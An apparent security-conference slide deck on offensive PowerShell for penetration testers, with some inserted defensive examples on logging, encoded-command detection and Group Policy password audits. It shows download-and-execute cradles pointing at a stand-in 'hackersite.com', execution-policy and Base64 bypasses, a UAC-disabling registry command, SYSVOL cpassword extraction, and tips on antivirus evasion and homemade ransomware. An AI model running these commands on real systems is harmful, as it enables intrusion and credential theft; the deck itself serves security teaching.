Power on, PowerShell
Using PowerShell to do the nasty
Nikhil Sreekumar [email protected]
@roo7break www.roo7break.co.uk
The plug
• Nikhil Sreekumar – Senior Penetration Tester @ 7Safe
– Over three years as a penetration tester
• CREST ACE certified
– Also delivers 7Safe's courses
• CSTP – Certified Security Testing Professional
• CAST – Certified Application Security Tester (advanced)
– Previous roles
• Breach Forensic Investigator
• IT Consultant
– Loves Python; mixed feelings for Ruby; hates Perl
Intro
• Normal penetration testing revolves a lot around network-based attacks using
– Attack frameworks (toolkits)
• Social Engineering Toolkit
• Metasploit
• Core Impact
– Exploit sources
• Exploit-db.com
• 1337day.com
• Exploit -> Get a shell -> Exploit more -> Get domain admin -> Report -> Go out for a beer
But, what if
• You have access to a system, but
– No outbound connection*
– You are in a restricted environment (e.g. Citrix)
– Current user privileges are very restricted
– Payloads/tools detected by Anti-Virus/HIDS
* Open traffic is blocked
Time for a rethink
• Cannot rely on any open source exploitation framework
– AV vendors are WATCHING!
– System/Network admins are getting smarter and cleverer
– Organisations are investing in security
• Maybe it's time to think of an alternate solution.
– Why not look into bending existing technology to do our bidding?
Welcome to, PowerShell
• Unix bash-like shell in Windows
– Far more powerful than CMD
• Available from Vista upwards
– Can be disabled from Server 2008; however, it's not that easy in Windows 7
• Allows you to
– Manage registry, services, processes, event logs and Windows Management Instrumentation (WMI)
– Task-based scripting language
– Powerful object manipulation capabilities
– Simplified and consistent design
• Full integration with
– Existing Microsoft products like Exchange, AD, etc.
– Can be directly called from the .NET framework
[Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx
Show me the money
Scripting PowerShell
• Use of CmdLets
– Lightweight command; used in PowerShell environment.
– Typically a .NET framework class
– Invoked within the context of automation scripts provided at the command line.
– Also invoked programmatically through Windows PowerShell APIs.
Scripting PowerShell
• Basic CmdLets
CmdLet          PowerShell alias   CMD.exe         *nix environment
Get-Help        man, help          help            man
Get-Content     cat, gc, type      type            cat
Move-Item       move, mv, mi       move            mv
Copy-Item       cp, copy, cpi      copy            cp
Select-String   NONE               find, findstr   grep
Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
Scripting PowerShell
• Basic CmdLets (contd.)
– Where-Object (alias ?)
• Filters objects passed down via the pipe (|)
Get-Service | ? { $_.Status -eq "Running" }
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*" }
– ForEach-Object (alias %)
• Not to be confused with the loop statement, ForEach
• Action to be performed on each object passed down via the pipe (|)
Get-ChildItem | ForEach-Object { echo $_.Name }
Same as dir :D
– Get-Member (alias gm)
• Lists the members (properties and methods) of the objects coming down the pipe, which you can use to filter your query with ? and %
Get-ChildItem | gm
• For more info, refer to:
– http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/
– http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx
How to script using PowerShell
• Using the PowerShell shell
– RUN powershell.exe to start
• Echo commands into a file; save as .ps1
– .ps1 files are automatically recognised as PowerShell scripts
– Can be manipulated using the built-in PowerShell Integrated Scripting Environment (ISE)
– IDE for PowerShell
Sample uses for PT
• Port Scanning
1..1024 | ForEach-Object { echo ((New-Object Net.Sockets.TcpClient).Connect("<TargetIP>",$_)) "Port $_ is open" } 2>$null
Port 80 is open
• You could modify the script above to send a string to the remote host for egress checking
• Port Sweep
– Scan the range for all IPs with port 8080 open
1..255 | ForEach-Object { echo ((New-Object Net.Sockets.TcpClient).Connect("10.1.1.$_",8080)) "10.1.1.${_}:8080 is open" } 2>$null
10.1.1.100:8080 is open
Sample uses for PT
• Downloading stuff
– Binaries
(New-Object System.Net.WebClient).DownloadFile("http://hackersite.com/pwnc.exe","c:\pwnc.exe")
– Text file stdout to local file
(New-Object System.Net.WebClient).DownloadString("http://hackersite.com/malicious.ps1") | Out-File -Encoding ASCII securescript.ps1
Hold on tiger
• Did you really think it's going to be that easy??
– PowerShell isn't going to let you run any script without having a say.
• It tries to enforce "security" using something called Execution Policy.
– Get-ExecutionPolicy
• Will give you the current policy status
The Security
• Execution Policies:
– Restricted
• Default policy
• Only individual commands; no scripts
– AllSigned
• Allows script execution
• Scripts need to be signed by a trusted publisher
• Prompts if run with scripts from untrusted publishers
– RemoteSigned
• Allows script execution
• Scripts downloaded from the Internet should be signed by a trusted publisher
• Signing not required for local scripts
The Security (contd.)
– Unrestricted
• Allows unsigned script execution
• Prompts a warning before execution
– Bypass
• Nothing is blocked; no warnings or prompts
• To be used when PowerShell is used within a larger app
– Undefined
• No specific policy is set for the current scope
– If nothing is specified, the default policy is applied = Restricted.
• For more information, RTFM
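Added example, not from the original deck: the execution policy per scope, followed by the logging policies that record what actually ran, which is what a defender is left with once a policy is bypassed. It assumes local admin rights to write under HKLM:\SOFTWARE\Policies and uses the standard Group Policy-backed key and value names for Windows PowerShell 5.x.

```powershell
# Added example, not from the original deck: list the execution policy per scope and turn
# on the PowerShell logging policies that record what was actually run. Writing under
# HKLM:\SOFTWARE\Policies needs local admin; the key and value names are the standard
# Group Policy-backed ones for Windows PowerShell 5.x.

# Scopes are listed in precedence order; the first one that is not Undefined wins.
Get-ExecutionPolicy -List | Format-Table Scope, ExecutionPolicy -AutoSize

$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$settings = @{
    # Event 4104: full script block text, i.e. -EncodedCommand payloads after decoding
    'ScriptBlockLogging' = @{ EnableScriptBlockLogging = 1 }
    # Event 4103: pipeline execution details per module
    'ModuleLogging'      = @{ EnableModuleLogging = 1 }
    # Over-the-shoulder transcript of every session, written to OutputDirectory
    'Transcription'      = @{ EnableTranscripting = 1; EnableInvocationHeader = 1; OutputDirectory = 'C:\PSTranscripts' }
}

foreach ($key in $settings.Keys) {
    $path = Join-Path $base $key
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    foreach ($name in $settings[$key].Keys) {
        $value = $settings[$key][$name]
        $type  = if ($value -is [int]) { 'DWord' } else { 'String' }
        Set-ItemProperty -Path $path -Name $name -Value $value -Type $type
    }
}

# Module logging only records modules listed under ModuleNames; '*' means all of them.
$moduleNames = Join-Path $base 'ModuleLogging\ModuleNames'
if (-not (Test-Path $moduleNames)) { New-Item -Path $moduleNames -Force | Out-Null }
Set-ItemProperty -Path $moduleNames -Name '*' -Value '*' -Type String

# Confirm what is now configured.
Get-ChildItem $base -Recurse | Get-ItemProperty
```

With script block logging on, the 4104 events carry the decoded text of an -EncodedCommand, so the Base64 wrapper buys an attacker nothing against a host that logs.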
However
Before we move on
• UAC (User Account Control)
– Is a pain in the a**
• Most of the attacks described may or may not interfere with UAC.
• At this point in time, we cannot bypass UAC. Or can we?
– Will take this up at a later stage.
• To check the UAC level
$(Get-ItemProperty -Path registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA).EnableLUA
If the value is "1", then UAC is ON.
• To disable UAC (0 = off)
Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -Value 0
However, we need local admin rights
And a system reboot for this change to take effect
Think like a hacker
• These policies can be bypassed
• Technique #1
Change the default policy to RemoteSigned
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
– However, we need admin privileges to do this
– You don't want to 'accidentally' set the policy for all users
Think like a hacker
• Technique #2
Pass the command
powershell -command dir
• Executes the specified commands (and any parameters) as though they were typed at the PowerShell command prompt
[Powershell Help]
Think like a hacker
• Technique #2 (contd.)
Pass the command
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://hackersite.com/pwnc.exe','c:\pwnc.exe')"
powershell -command "Invoke-Expression (gc .\script.ps1)"
• Need a one liner?
gc .\script.ps1 | iex
Think like a hacker
• Technique #3 CreateCMD
• Run a script without actually running a script
– Execute the script contents in the current shell context, with all the new functions that are in the script
• Uses "-EncodedCommand"
– Accepts a Base64 version of the command
• Check out Dave Kennedy (ReL1K) and Josh Kelly (winfang)'s Defcon 18 talk – PowerShell.. OMFG
• Impact
– Policy does not matter
– No need to disable execution policies
– No registry interaction, no reboots, etc.
Think like a hacker
• Technique #3 (contd.)
– Write your script (.ps1) in one long line.
– All commands should be on the same line and use ; to terminate each command.
$command = Get-Content .\script.ps1
$encodedcmd = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
powershell.exe -EncodedCommand $encodedcmd
Think like a hacker
• Technique #4
• This technique will
– try and bypass the execution policy
– execute the script in the background
• Can be used once you have a way into a system – E.g. shell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File <script_name>
Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html
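Added example, not from the original deck: the detection side of Techniques #3 and #4. It triages logged PowerShell command lines for -EncodedCommand, -ExecutionPolicy Bypass and the hidden/non-interactive switches, and decodes the Base64 payload exactly as powershell.exe would (UTF-16LE). The $commandLines array is a constructed sample standing in for the CommandLine field of Security event 4688 or Sysmon event 1.

```powershell
# Added example, not from the original deck: triage logged PowerShell command lines for the
# patterns Techniques #3 and #4 leave behind and decode the Base64 payload the way the host
# does. $commandLines is a constructed sample standing in for the CommandLine field of
# Security event 4688 or Sysmon event 1; feed it real values from Get-WinEvent in practice.

$commandLines = @(
    'powershell.exe -NoProfile -Command "Get-Date"'
    'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\Users\Public\run.ps1'
    'powershell.exe -EncodedCommand ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('gc .\script.ps1 | iex'))
)

function Decode-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover -e, -ec, -enc and the full name.
    if ($CommandLine -match '(?i)\s-e(nc(odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) }
        catch { return $null }   # not valid Base64: leave it to the analyst
    }
    return $null
}

function Test-SuspiciousPowerShell {
    param([string]$CommandLine)
    $flags = @()
    if ($CommandLine -match '(?i)-ExecutionPolicy\s+Bypass') { $flags += 'ExecutionPolicy Bypass' }
    if ($CommandLine -match '(?i)-WindowStyle\s+Hidden')     { $flags += 'Hidden window' }
    if ($CommandLine -match '(?i)-NonInteractive')            { $flags += 'NonInteractive' }
    $decoded = Decode-EncodedCommand $CommandLine
    if ($decoded) {
        $flags += 'EncodedCommand'
        # The decoded text is what to hunt in: download cradles and Invoke-Expression are the usual payloads.
        if ($decoded -match '(?i)\b(iex|Invoke-Expression|DownloadString|DownloadFile)\b') { $flags += 'Decoded payload evaluates or downloads code' }
    }
    [pscustomobject]@{
        CommandLine = $CommandLine
        Decoded     = $decoded
        Flags       = ($flags -join ', ')
        Suspicious  = ($flags.Count -gt 0)
    }
}

$commandLines | ForEach-Object { Test-SuspiciousPowerShell $_ } | Format-List
```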
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences
• Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO) [http://technet.microsoft.com/en-us/library/cc731892%28WS.10%29.aspx]
• Helps set the local admin password for workstations and servers
– Adding new users on local machines, etc.
– Via the Local Users and Groups extension
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences (contd.)
• Unknown to the general public (and many system admins), Windows was storing the encrypted admin passwords in XML files accessible to normal users
• Location:
– \\server\sysvol\domain\Policies\Hash\MACHINE\Preferences\Groups\Group.xml
Post Exploitation the PowerShell way
Exploiting Windows 2008 Group Policy Preferences (contd.)
• Encryption – AES = Strong
• It would take years to decrypt that password. Only if someone could help me..
• Why not ask Microsoft?
http://msdn.microsoft.com/en-us/library/cc422924.aspx
Post Exploitation the PowerShell way
• Let's use PowerShell to extract these passwords
– Connect to the domain controller as a normal user
$output = Get-ChildItem \\server\sysvol\domain\Policies\ -Filter *.xml -Recurse | Get-Content
# Matches (not Match) so every cpassword in the tree is returned, not just the first
[regex]::Matches($output,'cpassword="(?<pwd>.+?)"') | ForEach-Object { $_.Groups["pwd"].Value }
Post Exploitation the PowerShell way
• Are there any more locations?
• Oh yeah!
– Services\Services.xml
– ScheduledTasks\ScheduledTasks.xml
– Printers\Printers.xml
– Drives\Drives.xml
– DataSources\DataSources.xml
• Source: http://rewtdance.blogspot.co.uk/2012/06/exploiting-windows-2008-group-policy.html
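Added example, not from the original deck: an audit of a SYSVOL Policies tree for every preference type listed above (Groups, Services, ScheduledTasks, Printers, Drives, DataSources) that still carries a cpassword attribute, reporting the GPO, file and account without decrypting anything, so the offending GPOs can be found and cleaned up. The Policies tree and its Groups.xml are constructed in a temp folder so the example runs offline; in a real audit point -PoliciesRoot at \\<domain>\SYSVOL\<domain>\Policies.

```powershell
# Added example, not from the original deck: audit a SYSVOL Policies tree for Group Policy
# Preference files that still carry a cpassword attribute and report where they live,
# without decrypting anything. The Policies tree and the Groups.xml in it are constructed
# in a temp folder so this runs offline; in a real audit point -PoliciesRoot at
# \\<domain>\SYSVOL\<domain>\Policies.

function Find-GppCpassword {
    param([Parameter(Mandatory)][string]$PoliciesRoot)
    Get-ChildItem -Path $PoliciesRoot -Filter *.xml -Recurse -File | ForEach-Object {
        $file = $_
        try { $xml = [xml](Get-Content -LiteralPath $file.FullName -Raw) } catch { return }
        # Any element with a cpassword attribute, whatever the preference type
        # (Groups, Services, ScheduledTasks, Drives, DataSources, Printers).
        foreach ($node in $xml.SelectNodes('//*[@cpassword]')) {
            [pscustomobject]@{
                Gpo       = $file.FullName -replace '.*\\(\{[0-9A-Fa-f-]+\})\\.*', '$1'
                File      = $file.FullName.Substring($PoliciesRoot.Length).TrimStart('\')
                Element   = $node.ParentNode.LocalName
                Account   = $node.GetAttribute('userName')
                HasSecret = $node.GetAttribute('cpassword').Length -gt 0
            }
        }
    }
}

# --- constructed sample tree; the GUID is just a folder name here ---
$root = Join-Path ([IO.Path]::GetTempPath()) 'gpp-audit-sample\Policies'
$gpo  = Join-Path $root '{00000000-1111-2222-3333-444444444444}\MACHINE\Preferences\Groups'
New-Item -ItemType Directory -Path $gpo -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-SAMPLE-NOT-A-REAL-VALUE"/>
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $gpo 'Groups.xml') -Encoding UTF8

Find-GppCpassword -PoliciesRoot $root | Format-Table -AutoSize
```

Any row with HasSecret set to True is a GPO whose preference item should be removed or recreated without a stored password, and the account it names should have its password changed.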
Post Exploitation the PowerShell way
Would you like some exploitation with that, Sir?
• Default tools/exploits/payloads are detectable
– Customize them
– Design your own exploits
– Innovative encoding/encryption techniques
– Use PowerShell to execute it for you
• Examples
– Hyperion runtime encrypter by Nullsecurity.net
• Produces an AES-encrypted executable that brute forces its own key in memory
• Can bypass most anti-virus solutions
• http://nullsecurity.net/papers.html
– Alphanum + ASCII encode + Base64 your executable (use Metasploit to do this – msfvenom)
• Then use PowerShell to decode it in memory and execute it
– Check out www.exploit-monday.com by Matthew Graeber for sample code
– Also check out the PowerShell code used in SET - http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/
• Can bypass most anti-virus solutions
• http://www.offensive-security.com/metasploit-unleashed/Msfvenom
• Homework
• Try out PowerShell-based attacks using the Social Engineering Toolkit (SET)
• Recode Metasploit modules to be used within PowerShell scripts
• Come up with innovative attacks using PowerShell.
– Webcam, microphone, keyloggers, etc.
• Naughty, naughty.
• How about designing your own ransomware
– Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not accept any responsibility for your actions. Your actions, your responsibility. I have warned you.
– http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
More??
Powered by PowerShell
• Existing PowerShell-based attack tools
– Metasploit PowerShell modules
– PowerSploit
– Nishang
– PowerSyringe
• Recommended Reads and References
– PowerShell for Pentesters
• http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
– PowerShell OMFG
• https://www.trustedsec.com/august-2010/powershell_omfg/
– PowerShell Code Repository
• http://poshcode.org/
– Windows PowerShell Cookbook
• By Lee Holmes
– Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned
• By Chris Gates (carnal0wnage)
• http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences
And to conclude
• Sys admins/Network admins/Managers
– Check out every new feature introduced by a vendor
– Is it necessary for your org? No? Remove/disable it.
– Ensure AV is installed and updated on the production environment.
– Attend more security conferences to find out what new tech the hackers could use to attack your organisation.
• Hackers/Pentesters
– Check out every new feature introduced by a vendor
– Look at how you can twist various features to do your bidding
– Don't rely on your attack tools
– Remember AV vendors are watching and catching up
– Push yourself – come up with innovative tech
– Communicate all new tech you find. Our community is very open. You could end up finding an even better way to attack.
• Twitter: @roo7break
• Web: www.roo7break.co.uk
• Email: [email protected]